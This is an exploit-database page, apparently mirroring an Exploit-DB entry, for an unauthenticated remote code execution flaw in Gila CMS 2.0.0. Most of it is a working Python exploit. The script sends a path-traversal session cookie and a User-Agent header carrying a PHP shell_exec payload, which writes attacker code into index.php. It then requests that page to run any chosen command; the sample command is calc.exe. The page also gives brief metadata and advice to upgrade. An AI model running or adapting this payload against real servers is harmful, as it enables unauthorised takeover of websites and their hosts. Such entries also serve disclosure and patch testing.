header-logo
Suggest Exploit
vendor:
Gila
by:
Enesdex
9.8
CVSS
HIGH
Remote Code Execution
78
CWE
Product Name: Gila
Affected Version From: x < 2.0.0
Affected Version To: 2.0.0
Patch Exists: YES
Related CWE: N/A
CPE: a:gilacms:gila:2.0.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10
2021

Gila CMS 2.0.0 – Remote Code Execution (Unauthenticated)

Gila CMS version 2.0.0 and below is vulnerable to Remote Code Execution. An unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request with a malicious User-Agent header. The malicious payload will be executed on the server and the attacker can gain access to the server.

Mitigation:

Upgrade to the latest version of Gila CMS.
Source

Exploit-DB raw data:

# Exploit Title: Gila CMS 2.0.0 - Remote Code Execution (Unauthenticated)
# Date: 1.12.2021
# Exploit Author: Enesdex
# Vendor Homepage: https://gilacms.com/
# Software Link: https://github.com/GilaCMS/gila/releases/tag/2.0.0
# Version: x < 2.0.0 
# Tested on: Windows 10

import requests
import time

target_url = "http://192.168.1.101:80/Gila/"
cmd = "calc.exe"

url = target_url+"?c=admin"
cookies = {"GSESSIONID": "../../index.php"}
headers = {"User-Agent": "<?php shell_exec('"+cmd+"'); include 'src\\core\\bootstrap.php';  ?>"}
requests.get(url, headers=headers, cookies=cookies)
time.sleep(5)
requests.get(target_url+"/index.php")

Navigation

Suggest Exploit

Services By CQR